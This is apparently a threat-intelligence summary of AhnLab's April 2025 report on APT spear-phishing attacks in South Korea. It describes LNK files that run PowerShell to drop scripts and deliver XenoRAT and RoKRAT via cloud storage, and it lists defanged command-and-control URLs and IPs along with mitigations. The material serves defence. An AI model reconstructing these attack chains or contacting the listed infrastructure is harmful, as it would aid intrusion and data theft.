Full Report
Overview AhnLab is monitoring Advanced Persistent Threat (APT) attacks in South Korea using its own infrastructure. This report covers the classification, statistics, and functions of APT attacks detected in South Korea over the course of one month in April 2025. Figure 1. Statistics of APT attacks in South Korea in April 2025 […]
Analysis Summary
# Threat Actor: Unspecified APT Actor (Monitoring by AhnLab)
## Attribution & Identity
The report summarizes activity observed by AhnLab monitoring infrastructure in South Korea during April 2025. Specific attribution to a known named Advanced Persistent Threat (APT) group is **not explicitly provided** in this segment, though the activity is classified as APT attacks.
## Activity Summary
The summary focuses on APT attacks observed in South Korea during April 2025. The overwhelming majority of confirmed infiltration methods involved **spear phishing**. The actor conducts reconnaissance prior to launching these attacks to craft convincing emails, often utilizing email spoofing.
Key attack types observed via spear phishing include:
1. **Attacks Using LNK Type A:** Distribution via LNK files embedded with malicious PowerShell commands. These actions extract and execute scripts (bat, ps1, vbs) from a contained CAB file, leading to information leakage and the download of additional malware. Decoy documents were used to mask the malicious intent.
2. **Attacks Using LNK Type B:** Distribution via LNK files, usually alongside seemingly legitimate files in compressed formats. These LNK files execute a malicious PowerShell command to download and deploy RAT malware using cloud services like Dropbox API or Google Drive.
## Tactics, Techniques & Procedures
- **Initial Access:** Spear Phishing (Highly prevalent).
- **Execution:** Execution of malicious PowerShell commands embedded within LNK files.
- **Defense Evasion/Persistence:** Use of obfuscated RAT malware.
- **Collection:** Keylogging and screen capturing (via deployed RATs).
- **Command and Control:** Use of cloud storage APIs (Dropbox API, Google Drive) for malware delivery/staging.
**MITRE ATT&CK IDs (Inferred from TTPs):**
*Spear Phishing likely relates to T1566.001/T1566.002.*
*PowerShell execution relates to T1059.001.*
*Remote Access Tool usage relates to T1219.*
## Targeting
- **Sectors:** Not explicitly detailed, but the context strongly implies targeting related to South Korean entities given AhnLab's focus and the decoy document names (e.g., tax notices, financial forms).
- **Geography:** South Korea.
- **Victims:** Unspecified organizations, victims are derived from AhnLab's monitoring infrastructure.
## Tools & Infrastructure
- **Malware families used:**
* XenoRAT
* RoKRAT (RAT malware)
* Custom scripts (bat, ps1, vbs)
* Malware dropper/downloader components utilizing CAB archives.
- **Infrastructure (C2, domains, IPs):**
* `http://103[.]149[.]98[.]247/vs/tt/d[.]php`
* `http://141[.]164[.]36[.]253/news[.]mail[.]rupolitics3491273452346/mail[.]ru[.]php`
* `http://141[.]164[.]58[.]164/news[.]mail[.]rupolitics34502732480574853/mail[.]ru[.]php`
* `http://aomeio[.]r-e[.]kr/comarov/app/google`
* `http://aomeioras2[.]r-e[.]kr/`
* **IPs:** `64[.]20[.]59[.]148`
* **Cloud Storage for C2/Staging:** Dropbox API, Google Drive.
## Implications
This threat actor demonstrates a high degree of preparation, utilizing reconnaissance before deploying highly targeted spear phishing campaigns. The reliance on LNK files, script execution chains (PowerShell), and techniques to deliver well-known RATs indicates an established capability focused on persistent remote control and data exfiltration within the South Korean domain.
## Mitigations
- **Email Security:** Enhance anti-phishing controls, implement rigorous email sender verification rules, and block potentially malicious file types (LNK, compressed archives) from external sources.
- **Endpoint Detection and Response (EDR):** Deploy solutions capable of detecting and blocking anomalous PowerShell execution, script chaining, and known RAT indicators.
- **User Awareness Training:** Conduct specific training detailing how to identify highly personalized spear phishing emails, especially those masquerading as official government or financial documents (e.g., eTax invoices, tax notices).
- **Network Monitoring:** Monitor outbound traffic for connections to known C2 infrastructure or unusual activity accessing cloud storage APIs for downloading binaries.